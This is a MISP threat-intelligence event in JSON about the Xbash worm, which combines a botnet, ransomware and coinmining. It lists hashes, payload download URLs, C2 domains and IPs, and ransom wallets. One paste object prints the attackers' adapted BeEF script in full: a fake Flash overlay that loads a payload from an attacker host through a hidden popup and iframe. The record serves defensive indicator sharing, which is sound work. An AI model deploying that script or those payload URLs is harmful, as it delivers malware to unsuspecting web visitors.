{ "Event": { "analysis": "2", "date": "2018-09-19", "extends_uuid": "", "info": "OSINT (expanded) - Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows", "publish_timestamp": "1537334515", "published": true, "threat_level_id": "3", "timestamp": "1537334496", "uuid": "5ba1d01f-27cc-438f-9cbc-4652950d210f", "Orgc": { "name": "CIRCL", "uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f" }, "Tag": [ { "colour": "#a200ca", "name": "ms-caro-malware:malware-platform=\"Python\"" }, { "colour": "#ffffff", "name": "tlp:white" }, { "colour": "#00223b", "name": "osint:source-type=\"blog-post\"" }, { "colour": "#0088cc", "name": "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Exploit Public-Facing Application - T1190\"" }, { "colour": "#0088cc", "name": "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Standard Application Layer Protocol - T1071\"" }, { "colour": "#0088cc", "name": "misp-galaxy:tool=\"Xbash\"" }, { "colour": "#0088cc", "name": "misp-galaxy:threat-actor=\"Iron Group\"" } ], "Attribute": [ { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1537333842", "to_ids": false, "type": "link", "uuid": "5ba1d038-785c-41d2-8712-4c5d950d210f", "value": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/", "Tag": [ { "colour": "#00223b", "name": "osint:source-type=\"blog-post\"" } ] }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1537333843", "to_ids": false, "type": "text", "uuid": "5ba1d04d-25a0-455c-9ee7-45f3950d210f", "value": "Unit 42 researchers have found a new malware family that is targeting Linux and Microsoft Windows servers. We can tie this malware, which we have named Xbash, to the Iron Group, a threat actor group known for previous ransomware attacks.\r\n\r\nXbash has ransomware and coinmining capabilities. It also has self-propagating capabilities (meaning it has worm-like characteristics similar to WannaCry or Petya/NotPetya). It also has capabilities not currently implemented that, when implemented, could enable it to spread very quickly within an organizations\u00e2\u20ac\u2122 network (again, much like WannaCry or Petya/NotPetya).\r\n\r\nXbash spreads by attacking weak passwords and unpatched vulnerabilities.\r\n\r\nXbash is data-destructive; destroying Linux-based databases as part of its ransomware capabilities. We can also find no functionality within Xbash that would enable restoration after the ransom is paid. This means that, similar to NotPetya, Xbash is data destructive malware posing as ransomware.\r\n\r\nOrganizations can protect themselves against Xbash by:\r\n\r\n Using strong, non-default passwords\r\n Keeping up-to-date on security updates\r\n Implementing endpoint security on Microsoft Windows and Linux systems\r\n Preventing access to unknown hosts on the internet (to prevent access to command and control servers)\r\n Implementing and maintaining rigorous and effective backup and restoration processes and procedures.\r\n\r\nPalo Alto Networks customers are protected against Xbash as outlined at the end of this post.\r\n\r\nBelow are some more specifics on Xbash\u00e2\u20ac\u2122s capabilities:\r\n\r\n It combines botnet, coinmining, ransomware and self-propagation\r\n It targets Linux-based systems for its ransomware and botnet capabilities\r\n It targets Microsoft Windows-based systems for its coinmining and self-propagating capabilities\r\n The ransomware component targets and deletes Linux-based databases\r\n To date, we have observed 48 incoming transactions to these wallets with total income of about 0.964 bitcoins meaning 48 victims have paid about US $6,000 total (at the time of this writing)\r\n However, as see no evidence that the paid ransoms have resulted in recovery for the victims\r\n In fact, we can find no evidence of any functionality that makes recovery possible through ransom payment.\r\n Our analysis shows this is likely the work of the Iron Group, a group publicly linked to other ransomware campaigns including those that use the Remote Control System (RCS), whose source code was believed to be stolen from the HackingTeam in 2015.", "Tag": [ { "colour": "#00223b", "name": "osint:source-type=\"blog-post\"" } ] }, { "category": "Financial fraud", "comment": "If Xbash successfully logs in to a service including MySQL, MongoDB, and PostgreSQL, it will delete almost all existing databases in the server (except for some databases that stored user login information), create a new database named \u00e2\u20ac\u0153PLEASE_READ_ME_XYZ\u00e2\u20ac\u009d, and insert a ransom message into table \u00e2\u20ac\u0153WARNING\u00e2\u20ac\u009d of the new database, as shown in Figure 4 and Figure 5. Send 0.02 BTC to this address and contact this email with your website or your ip or db_name of your server to recover your database! Your DB is Backed up to our servers!If we not received your payment,we will leak your database 1jqpmcLygJdH8fN7BCk2cwwNBRWqMZqL1 backupsql@pm.me", "deleted": false, "disable_correlation": false, "timestamp": "1537331367", "to_ids": true, "type": "btc", "uuid": "5ba1d0a7-b470-45ff-ba90-27fb950d210f", "value": "1jqpmcLygJdH8fN7BCk2cwwNBRWqMZqL1" }, { "category": "Payload delivery", "comment": "zlibx", "deleted": false, "disable_correlation": false, "timestamp": "1537331799", "to_ids": true, "type": "sha256", "uuid": "5ba1d257-f6fc-4740-b3f8-28a2950d210f", "value": "7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa" }, { "category": "Payload delivery", "comment": "Xbash", "deleted": false, "disable_correlation": false, "timestamp": "1537331800", "to_ids": true, "type": "sha256", "uuid": "5ba1d258-c978-467b-acc6-28a2950d210f", "value": "0b9c54692d25f68ede1de47d4206ec3cd2e5836e368794eccb3daa632334c641" }, { "category": "Payload delivery", "comment": "xapache", "deleted": false, "disable_correlation": false, "timestamp": "1537331800", "to_ids": true, "type": "sha256", "uuid": "5ba1d258-9f30-40cc-b608-28a2950d210f", "value": "dbc380cbfb1536dfb24ef460ce18bccdae549b4585ba713b5228c23924385e54" }, { "category": "Payload delivery", "comment": "libhttpd", "deleted": false, "disable_correlation": false, "timestamp": "1537331801", "to_ids": true, "type": "sha256", "uuid": "5ba1d259-3908-490a-947e-28a2950d210f", "value": "5b790f02bdb26b6b6b270a5669311b4f231d17872aafb237b7e87b6bbb57426d" }, { "category": "Payload delivery", "comment": "XbashX", "deleted": false, "disable_correlation": false, "timestamp": "1537331801", "to_ids": true, "type": "sha256", "uuid": "5ba1d259-08f8-485f-ac9b-28a2950d210f", "value": "e59be6eec9629d376a8a4a70fe9f8f3eec7b0919019f819d44b9bdd1c429277c" }, { "category": "Payload delivery", "comment": "XbashY", "deleted": false, "disable_correlation": false, "timestamp": "1537331801", "to_ids": true, "type": "sha256", "uuid": "5ba1d259-24bc-4aed-a9c2-28a2950d210f", "value": "f808a42b10cf55603389945a549ce45edc6a04562196d14f7489af04688f12bc" }, { "category": "Payload delivery", "comment": "rootv2.sh", "deleted": false, "disable_correlation": false, "timestamp": "1537331802", "to_ids": true, "type": "sha256", "uuid": "5ba1d25a-0a94-45e3-a624-28a2950d210f", "value": "dcd37e5b266cc0cd3fab73caa63b218f5b92e9bd5b25cf1cacf1afdb0d8e76ff" }, { "category": "Payload delivery", "comment": "owerv2.sh", "deleted": false, "disable_correlation": false, "timestamp": "1537331802", "to_ids": true, "type": "sha256", "uuid": "5ba1d25a-3294-4259-ba5a-28a2950d210f", "value": "de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d" }, { "category": "Payload delivery", "comment": "rootv2.sh", "deleted": false, "disable_correlation": false, "timestamp": "1537331803", "to_ids": true, "type": "sha256", "uuid": "5ba1d25b-0cd8-42b3-891c-28a2950d210f", "value": "09968c4573580398b3269577ced28090eae4a7c326c1a0ec546761c623625885" }, { "category": "Payload delivery", "comment": "r88.sh", "deleted": false, "disable_correlation": false, "timestamp": "1537331803", "to_ids": true, "type": "sha256", "uuid": "5ba1d25b-6a28-48a6-9413-28a2950d210f", "value": "a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af" }, { "category": "Payload delivery", "comment": "tt.txt", "deleted": false, "disable_correlation": false, "timestamp": "1537331865", "to_ids": true, "type": "sha256", "uuid": "5ba1d299-3438-4286-a1ad-4737950d210f", "value": "f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8" }, { "category": "Payload delivery", "comment": "tg.jpg", "deleted": false, "disable_correlation": false, "timestamp": "1537331866", "to_ids": true, "type": "sha256", "uuid": "5ba1d29a-7290-41ea-bdb1-4f76950d210f", "value": "31155bf8c85c6c6193842b8d09bda88990d710db9f70efe85c421f1484f0ee78" }, { "category": "Payload delivery", "comment": "reg9.sct", "deleted": false, "disable_correlation": false, "timestamp": "1537331866", "to_ids": true, "type": "sha256", "uuid": "5ba1d29a-b8e8-46d8-b9c5-4381950d210f", "value": "725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054" }, { "category": "Payload delivery", "comment": "m.png", "deleted": false, "disable_correlation": false, "timestamp": "1537331867", "to_ids": true, "type": "sha256", "uuid": "5ba1d29b-e3c8-48d7-b1a1-4ac9950d210f", "value": "d7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6" }, { "category": "Payload delivery", "comment": "tmp.jpg", "deleted": false, "disable_correlation": false, "timestamp": "1537331867", "to_ids": true, "type": "sha256", "uuid": "5ba1d29b-1d08-4090-82a2-47f7950d210f", "value": "ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332429", "to_ids": true, "type": "url", "uuid": "5ba1d4cd-2424-40e7-a047-48a4950d210f", "value": "http://3g2upl4pq6kufc4m.tk/zlibx" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332429", "to_ids": true, "type": "url", "uuid": "5ba1d4cd-aaa0-4f57-93b1-4771950d210f", "value": "http://e3sas6tzvehwgpak.tk/XbashY" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332430", "to_ids": true, "type": "url", "uuid": "5ba1d4ce-484c-4c15-8ce5-4d5f950d210f", "value": "http://3g2upl4pq6kufc4m.tk/XbashY" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332430", "to_ids": true, "type": "url", "uuid": "5ba1d4ce-5a48-4f70-91c6-4ce9950d210f", "value": "http://3g2upl4pq6kufc4m.tk/xapache" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332430", "to_ids": true, "type": "url", "uuid": "5ba1d4ce-db6c-4068-8334-4a3b950d210f", "value": "http://3g2upl4pq6kufc4m.tk/libhttpd" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332431", "to_ids": true, "type": "url", "uuid": "5ba1d4cf-b984-4242-bafc-49d0950d210f", "value": "http://xmr.enjoytopic.tk/l/rootv2.sh" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332431", "to_ids": true, "type": "url", "uuid": "5ba1d4cf-0f64-408b-8b8d-42a0950d210f", "value": "http://xmr.enjoytopic.tk/l2/rootv2.sh" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332432", "to_ids": true, "type": "url", "uuid": "5ba1d4d0-bddc-4521-814d-473c950d210f", "value": "http://xmr.enjoytopic.tk/l/r88.sh" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332432", "to_ids": true, "type": "url", "uuid": "5ba1d4d0-1d8c-424a-b2d8-4430950d210f", "value": "http://xmr.enjoytopic.tk/12/r88.sh" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332433", "to_ids": true, "type": "url", "uuid": "5ba1d4d1-1698-491d-a555-4331950d210f", "value": "http://e3sas6tzvehwgpak.tk/lowerv2.sh" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332433", "to_ids": true, "type": "url", "uuid": "5ba1d4d1-2518-4b2f-be8f-46e4950d210f", "value": "http://3g2upl4pq6kufc4m.tk/r88.sh" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332434", "to_ids": true, "type": "url", "uuid": "5ba1d4d2-1cd0-4dbb-bb96-444e950d210f", "value": "http://e3sas6tzvehwgpak.tk/XbashX" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332434", "to_ids": true, "type": "url", "uuid": "5ba1d4d2-98dc-4ef9-a073-4449950d210f", "value": "http://png.realtimenews.tk/m.png" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332434", "to_ids": true, "type": "url", "uuid": "5ba1d4d2-39ec-4b98-ae74-42bb950d210f", "value": "http://daknobcq4zal6vbm.tk/tt.txt" }, { "category": "Network activity", "comment": "Downloading URLs", "deleted": false, "disable_correlation": false, "timestamp": "1537332435", "to_ids": true, "type": "url", "uuid": "5ba1d4d3-4da0-43c6-a073-4820950d210f", "value": "http://d3goboxon32grk2l.tk/reg9.sct" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332467", "to_ids": true, "type": "hostname", "uuid": "5ba1d4f3-0ef4-44cb-8e2e-4fc6950d210f", "value": "ejectrift.censys.xyz" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332467", "to_ids": true, "type": "hostname", "uuid": "5ba1d4f3-ba24-4602-99bb-43fc950d210f", "value": "scan.censys.xyz" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332468", "to_ids": true, "type": "hostname", "uuid": "5ba1d4f4-fa84-48bf-a1b9-49b8950d210f", "value": "api.leakingprivacy.tk" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332468", "to_ids": true, "type": "hostname", "uuid": "5ba1d4f4-9b88-4f01-a225-42c6950d210f", "value": "news.realnewstime.xyz" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332468", "to_ids": true, "type": "hostname", "uuid": "5ba1d4f4-47dc-4ee5-a3eb-43e5950d210f", "value": "scan.realnewstime.xyz" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332469", "to_ids": true, "type": "hostname", "uuid": "5ba1d4f5-3b08-406a-8ad7-42cb950d210f", "value": "news.realtimenews.tk" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332469", "to_ids": true, "type": "domain", "uuid": "5ba1d4f5-50fc-4482-9ed4-4360950d210f", "value": "scanaan.tk" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332470", "to_ids": true, "type": "hostname", "uuid": "5ba1d4f6-5598-4a65-8dd5-44ff950d210f", "value": "scan.3g2upl4pq6kufc4m.tk" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332470", "to_ids": true, "type": "hostname", "uuid": "5ba1d4f6-4230-4c9b-80fe-4167950d210f", "value": "scan.vfk2k5s5tfjr27tz.tk" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332471", "to_ids": true, "type": "hostname", "uuid": "5ba1d4f7-a7c8-4c70-9fa5-47a1950d210f", "value": "scan.blockbitcoin.tk" }, { "category": "Network activity", "comment": "Domains for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332471", "to_ids": true, "type": "domain", "uuid": "5ba1d4f7-66f4-4d3f-ae76-40a8950d210f", "value": "blockbitcoin.com" }, { "category": "Network activity", "comment": "IPs for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332488", "to_ids": true, "type": "ip-dst", "uuid": "5ba1d508-02d8-44e3-a778-27c3950d210f", "value": "142.44.215.177" }, { "category": "Network activity", "comment": "IPs for C2 Communication", "deleted": false, "disable_correlation": false, "timestamp": "1537332489", "to_ids": true, "type": "ip-dst", "uuid": "5ba1d509-5e58-4d73-bd76-27c3950d210f", "value": "144.217.61.147" }, { "category": "Network activity", "comment": "URLs for C2 Domain Updating", "deleted": false, "disable_correlation": false, "timestamp": "1537332511", "to_ids": true, "type": "url", "uuid": "5ba1d51f-5344-4ba2-ae31-4bea950d210f", "value": "https://pastebin.com/raw/Xu74Mzif" }, { "category": "Network activity", "comment": "URLs for C2 Domain Updating", "deleted": false, "disable_correlation": false, "timestamp": "1537332511", "to_ids": true, "type": "url", "uuid": "5ba1d51f-d130-4d8f-a046-4e27950d210f", "value": "https://pastebin.com/raw/rBHjTZY6" }, { "category": "Financial fraud", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1537332542", "to_ids": true, "type": "btc", "uuid": "5ba1d53e-c4bc-4bf0-8245-4a22950d210f", "value": "1Kss6v4eSUgP4WrYtfYGZGDoRsf74M7CMr" }, { "category": "Financial fraud", "comment": "", "deleted": false, "disable_correlation": false, "timestamp": "1537332542", "to_ids": true, "type": "btc", "uuid": "5ba1d53e-b274-4731-abbb-4920950d210f", "value": "1ExbdpvKJ6M1t5KyiZbnzsdQ63SEsY6Bff" }, { "category": "Payload delivery", "comment": "Email Addresses in Ransom Messages", "deleted": false, "disable_correlation": false, "timestamp": "1537332575", "to_ids": true, "type": "email-dst", "uuid": "5ba1d55f-2fcc-49ac-b905-4e51950d210f", "value": "backupsql@protonmail.com" }, { "category": "Payload delivery", "comment": "Email Addresses in Ransom Messages", "deleted": false, "disable_correlation": false, "timestamp": "1537332576", "to_ids": true, "type": "email-dst", "uuid": "5ba1d560-0e08-460b-9909-480b950d210f", "value": "backupsql@pm.me" }, { "category": "Payload delivery", "comment": "Email Addresses in Ransom Messages", "deleted": false, "disable_correlation": false, "timestamp": "1537332576", "to_ids": true, "type": "email-dst", "uuid": "5ba1d560-2538-43e3-8bb2-4d1f950d210f", "value": "backupdatabase@pm.me" } ], "Object": [ { "comment": "", "deleted": false, "description": "Paste or similar post from a website allowing to share privately or publicly posts.", "meta-category": "misc", "name": "paste", "template_uuid": "cedc055c-78aa-49a4-bfd7-4cc30cecef12", "template_version": "4", "timestamp": "1537332652", "uuid": "5ba1d5ac-1460-4ba2-9ff1-458e950d210f", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "paste", "timestamp": "1537332652", "to_ids": false, "type": "text", "uuid": "5ba1d5ac-4b4c-486a-88ee-4b38950d210f", "value": "scan.vfk2k5s5tfjr27tz.tk\r\nscan.blockbitcoin.tkh" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "username", "timestamp": "1537332652", "to_ids": false, "type": "text", "uuid": "5ba1d5ac-4dd0-4d93-b667-4d80950d210f", "value": "wfkfly" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "origin", "timestamp": "1537332653", "to_ids": false, "type": "text", "uuid": "5ba1d5ad-9e90-4225-99a2-4679950d210f", "value": "pastebin.com" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "url", "timestamp": "1537332653", "to_ids": true, "type": "url", "uuid": "5ba1d5ad-17d8-4d8b-8b63-4f23950d210f", "value": "https://pastebin.com/raw/Xu74Mzif" } ] }, { "comment": "", "deleted": false, "description": "Paste or similar post from a website allowing to share privately or publicly posts.", "meta-category": "misc", "name": "paste", "template_uuid": "cedc055c-78aa-49a4-bfd7-4cc30cecef12", "template_version": "4", "timestamp": "1537332746", "uuid": "5ba1d60a-9f28-434d-b03a-4b86950d210f", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "paste", "timestamp": "1537332746", "to_ids": false, "type": "text", "uuid": "5ba1d60a-82f8-486e-99d5-4580950d210f", "value": "142.44.215.177\r\n144.217.61.147" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "username", "timestamp": "1537332747", "to_ids": false, "type": "text", "uuid": "5ba1d60b-7de0-4efe-bb0b-44ca950d210f", "value": "wfkfly" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "origin", "timestamp": "1537332747", "to_ids": false, "type": "text", "uuid": "5ba1d60b-8bb8-4e7a-a466-40fc950d210f", "value": "pastebin.com" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "url", "timestamp": "1537332747", "to_ids": true, "type": "url", "uuid": "5ba1d60b-8930-46d0-a00b-4dc6950d210f", "value": "https://pastebin.com/raw/rBHjTZY6" } ] }, { "comment": "", "deleted": false, "description": "Paste or similar post from a website allowing to share privately or publicly posts.", "meta-category": "misc", "name": "paste", "template_uuid": "cedc055c-78aa-49a4-bfd7-4cc30cecef12", "template_version": "4", "timestamp": "1537332851", "uuid": "5ba1d673-e378-45e9-9d50-41c6950d210f", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "paste", "timestamp": "1537332851", "to_ids": false, "type": "text", "uuid": "5ba1d673-8450-46fa-bc4e-4243950d210f", "value": "//\r\n// Copyright (c) 2006-2018 Wade Alcorn - wade@bindshell.net\r\n// Browser Exploitation Framework (BeEF) - http://beefproject.com\r\n// See the file 'doc/COPYING' for copying permission\r\n//\r\n\r\n // Module Configurations\r\nvar image = \"http://d20blzxlz9ydha.cloudfront.net/flash.png\";\r\nvar payload_type = \"Custom_Payload\";\r\nvar payload_uri = \"http://update.pythonanywhere.com/d\";\r\n\r\n//var beef_root = beef.net.httpproto + \"://\" + beef.net.host + \":\" + beef.net.port;\r\nvar payload = \"\";\r\n\r\n// Function to gray out the screen\r\nvar grayOut = function(vis, options) {\r\nvar options = options || {};\r\nvar zindex = options.zindex || 50;\r\nvar opacity = options.opacity || 70;\r\nvar opaque = (opacity / 100);\r\nvar bgcolor = options.bgcolor || '#000000';\r\nvar dark=document.getElementById('darkenScreenObject');\r\nif (!dark) {\r\n var tbody = document.getElementsByTagName(\"body\")[0];\r\n var tnode = document.createElement('div');\r\n tnode.style.position='absolute';\r\n tnode.style.top='0px';\r\n tnode.style.left='0px';\r\n tnode.style.overflow='hidden';\r\n tnode.style.display='none';\r\n tnode.id='darkenScreenObject';\r\n tbody.appendChild(tnode);\r\n dark=document.getElementById('darkenScreenObject');\r\n}\r\nif (vis) {\r\n var pageWidth='100%';\r\n var pageHeight='100%';\r\n dark.style.opacity=opaque;\r\n dark.style.MozOpacity=opaque;\r\n dark.style.filter='alpha(opacity='+opacity+')';\r\n dark.style.zIndex=zindex;\r\n dark.style.backgroundColor=bgcolor;\r\n dark.style.width= pageWidth;\r\n dark.style.height= pageHeight;\r\n dark.style.display='block';\r\n} else {\r\n dark.style.display='none';\r\n}\r\n};\r\n\r\n\r\n// Payload Configuration\r\nswitch (payload_type) {\r\n\tcase \"Custom_Payload\":\r\n\t payload = payload_uri;\r\n\tbreak;\r\n\tcase \"Firefox_Extension\":\r\n\t //payload = beef_root + \"/api/ipec/ff_extension\";\r\n\t break;\r\n\tdefault:\r\n\t //beef.net.send('<%= @command_url %>', <%= @command_id %>, 'error=payload not selected');\r\n\t break;\r\n}\r\n\r\n// Create DIV\r\nvar flashdiv = document.createElement('div');\r\nflashdiv.setAttribute('id', 'flashDiv');\r\nflashdiv.setAttribute('style', 'position:absolute; top:20%; left:30%; z-index:51;');\r\nflashdiv.setAttribute('align', 'center');\r\nvar id = setInterval(frame, 100);\r\nfunction frame() {\r\n\tif (document.body.appendChild(flashdiv)) {\r\n\t\t// window.open is very useful when using data URI vectors and the IFrame/Object tag\r\n\t\t// also, as the user is clicking on the link, the new tab opener is not blocked by the browser.\r\n\t\tflashdiv.innerHTML = \"\";\r\n\r\n\t\t// gray out the background\r\n\t\tgrayOut(true,{'opacity':'30'});\r\n\r\n\t\t// clean up on click\r\n\t\tdocument.getElementById(\"flashDiv\").onclick = function(){\r\n\t\t\tdocument.body.removeChild(flashdiv);\r\n\t\t\tgrayOut(false,{'opacity':'0'});\r\n\t\t\tdocument.body.removeChild(document.getElementById('darkenScreenObject'));\r\n\t\t\taa=window.open(\"http://dzebppteh32lz.cloudfront.net/c\",'popUpWindow','height=1,width=1,top=0,left=0,resizable=no,scrollbars=no,toolbar=no,menubar=no,location=no,directories=no,status=no')\r\n\t\t\t//aa=window.openwindow.open(\"http://d3lvemwrafj7a7.cloudfront.net/e\",'_blank', 'toolbar=no,status=no,menubar=no,scrollbars=no,resizable=no,left=10000, top=10000, width=10, height=10', ''); \r\n\t\t\taa.moveTo(10000,10000);\r\n\t\t\t//window.open(\"http://update.pythonanywhere.com/d\");\r\n\t\t\tvar iframe = document.createElement('iframe');\r\n\t\t\tiframe.style.display = \"none\";\r\n\t\t\tiframe.src = \"http://update.pythonanywhere.com/d\";\r\n\t\t\tdocument.body.appendChild(iframe);\r\n\t\t\t\r\n\t\t}\r\n\t clearInterval(id);\r\n\t} \r\n}" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "username", "timestamp": "1537332852", "to_ids": false, "type": "text", "uuid": "5ba1d674-5500-4354-b426-4bad950d210f", "value": "wfkfly" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "origin", "timestamp": "1537332852", "to_ids": false, "type": "text", "uuid": "5ba1d674-e264-47fd-a089-449e950d210f", "value": "pastebin.com" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "url", "timestamp": "1537332852", "to_ids": true, "type": "url", "uuid": "5ba1d674-f124-48c8-95ff-4bb8950d210f", "value": "https://pastebin.com/raw/AbhwC1Ki" } ] }, { "comment": "", "deleted": false, "description": "Paste or similar post from a website allowing to share privately or publicly posts.", "meta-category": "misc", "name": "paste", "template_uuid": "cedc055c-78aa-49a4-bfd7-4cc30cecef12", "template_version": "4", "timestamp": "1537332942", "uuid": "5ba1d6ce-de54-4d15-8134-27c3950d210f", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "paste", "timestamp": "1537332942", "to_ids": false, "type": "text", "uuid": "5ba1d6ce-d1e4-4362-a7ac-27c3950d210f", "value": "https://daknobcq4zal6vbm.tk/m.exe;" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "username", "timestamp": "1537332943", "to_ids": false, "type": "text", "uuid": "5ba1d6cf-498c-4df8-b61f-27c3950d210f", "value": "wfkfly" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "origin", "timestamp": "1537332943", "to_ids": false, "type": "text", "uuid": "5ba1d6cf-7928-4e3e-9e52-27c3950d210f", "value": "pastebin.com" }, { "category": "Network activity", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "url", "timestamp": "1537332943", "to_ids": true, "type": "url", "uuid": "5ba1d6cf-6ac4-4e0e-a8e7-27c3950d210f", "value": "https://pastebin.com/R5q9wvHw" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334462", "uuid": "9fb96957-5ea7-449a-bbd2-ff71922b5a6e", "ObjectReference": [ { "comment": "", "object_uuid": "9fb96957-5ea7-449a-bbd2-ff71922b5a6e", "referenced_uuid": "7c26518e-fa7a-453f-a4cd-e234d2520d3e", "relationship_type": "analysed-with", "timestamp": "1537334494", "uuid": "5ba1dcde-8d08-47a7-a596-4bfb02de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334459", "to_ids": true, "type": "md5", "uuid": "2dfc435d-b4df-4555-a431-9b756457575d", "value": "33357485c5c92f087bd53602d6d8a48b" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334460", "to_ids": true, "type": "sha1", "uuid": "04f77f08-d1ab-442e-bd14-ed4935e7e9fa", "value": "7403a54aa5ff712a8614e6a90398322d5fa7ba89" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334460", "to_ids": true, "type": "sha256", "uuid": "25172f79-b5d8-4ba0-8f65-157f7a90fce8", "value": "5b790f02bdb26b6b6b270a5669311b4f231d17872aafb237b7e87b6bbb57426d" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334461", "uuid": "7c26518e-fa7a-453f-a4cd-e234d2520d3e", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334461", "to_ids": false, "type": "datetime", "uuid": "cbf68cfc-a53a-4a67-b043-d514ef6c251a", "value": "2018-09-18T19:28:42" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334461", "to_ids": false, "type": "link", "uuid": "d17c47a6-5c9e-4b65-97a1-ecd5dd083c82", "value": "https://www.virustotal.com/file/5b790f02bdb26b6b6b270a5669311b4f231d17872aafb237b7e87b6bbb57426d/analysis/1537298922/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334462", "to_ids": false, "type": "text", "uuid": "6f915503-6a42-4a44-8ba4-a563bb038e7d", "value": "9/53" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334465", "uuid": "d33ee6ee-437e-4ce5-ab11-837fee0edc8c", "ObjectReference": [ { "comment": "", "object_uuid": "d33ee6ee-437e-4ce5-ab11-837fee0edc8c", "referenced_uuid": 